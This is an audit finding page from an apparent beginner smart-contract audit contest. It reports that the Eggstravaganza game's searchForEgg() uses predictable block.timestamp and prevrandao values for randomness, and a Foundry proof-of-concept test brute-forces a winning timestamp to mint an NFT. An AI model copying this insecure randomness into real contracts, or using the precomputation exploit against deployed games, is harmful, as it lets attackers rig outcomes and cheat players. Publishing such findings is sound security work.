Eggstravaganza

First Flight #37

Beginner FriendlySolidity

100 EXP

View results

Previous Next

Submission Details

Severity: high

Valid

[H-1] Weak On-Chain Randomness Allows Game Manipulation

agmguindo

Description:

Onchain randomnnes doesnt exist, and this protocol you are using a method that uses block.timestamp and block.prevramdao, which is deterministc and can be precalculated by a malicious actor and manipulate completly the game getting the certanty to find the timestamp where he has to call the Fn searchForEgg() to always win.

function searchForEgg() external {

require(gameActive, "Game not active");

require(block.timestamp >= startTime, "Game not started yet");

require(block.timestamp <= endTime, "Game ended");

// Pseudo-random number generation (for demonstration purposes only)

uint256 random = uint256(

keccak256(

abi.encodePacked(

block.timestamp,

block.prevrandao,

msg.sender,

eggCounter

)

) % 100;

console.log("RANDOM: ", random);

console.log("EGG COUNTER AT TIME:", eggCounter);

if (random < eggFindThreshold) {

eggCounter++;

eggsFound[msg.sender] += 1;

// e se lo envia al caller y el id del huevo a mintear coincide con el eggcounter.

eggNFT.mintEgg(msg.sender, eggCounter);

emit EggFound(msg.sender, eggCounter, eggsFound[msg.sender]);

}

Impact:

This vulnerability completely breaks the fairness of the game. A malicious actor can deterministically predict winning calls and mint as many NFTs as desired without any randomness. Since the random number generation is entirely dependent on predictable values, the attack can be executed consistently and at will.

Proof of Concept:

PoC

function test_auditBrokenRandomness() public {

game.startGame(1000);

uint256 statrtingBlocktime = block.timestamp;

uint256 blockNumber = block.number;

uint256 foundNumber;

uint256 foundBlock;

uint256 targetTime;

uint256 eggCounter = 0;

bytes32 randao = keccak256("seed");

vm.startPrank(alice);

while (true) {

vm.prevrandao(randao);

uint256 random = uint256(

keccak256(

abi.encodePacked(

block.timestamp,

block.prevrandao,

address(alice),

eggCounter

)

) % 100;

if (random < game.eggFindThreshold()) {

foundNumber = random;

foundBlock = block.number;

targetTime = block.timestamp;

break;

}

vm.warp(statrtingBlocktime++);

vm.roll(blockNumber++);

}

console.log("FoundNumber manipulated: ", foundNumber);

console.log("FoundNumber target Timestamp ", targetTime);

vm.prevrandao(randao);

vm.warp(targetTime);

vm.roll(foundBlock);

game.searchForEgg();

vm.stopPrank();

assert(game.eggsFound(address(alice)) == 1);

assert(nft.ownerOf(1) == address(alice));

}

Recommended Mitigation:

Avoid using deterministic and publicly accessible values like block.timestamp or block.prevrandao for randomness. Instead, integrate a secure randomness oracle such as Chainlink VRF, which provides verifiable and tamper-proof random numbers. This will ensure fairness and prevent manipulation by attackers.

Updates

Lead Judging Commences

m3dython Lead Judge 8 months ago

Submission Judgement Published

Validated

Assigned finding tags:

Insecure Randomness

Insecure methods to generate pseudo-random numbers

Rewards breakdown

nSLOC

129

This contest has a flat reward structure with the following payouts:

High

100 EXP

Medium

20 EXP

Low

2 EXP

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being carefully reviewed by our judges.

View all submissions

Appeals

This is your time to appeal against judgements on your submissions.

Appeals Review

Appeals are being carefully reviewed by our judges.

Rewards Distribution

The contest is complete and the rewards are being distributed.

View results

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!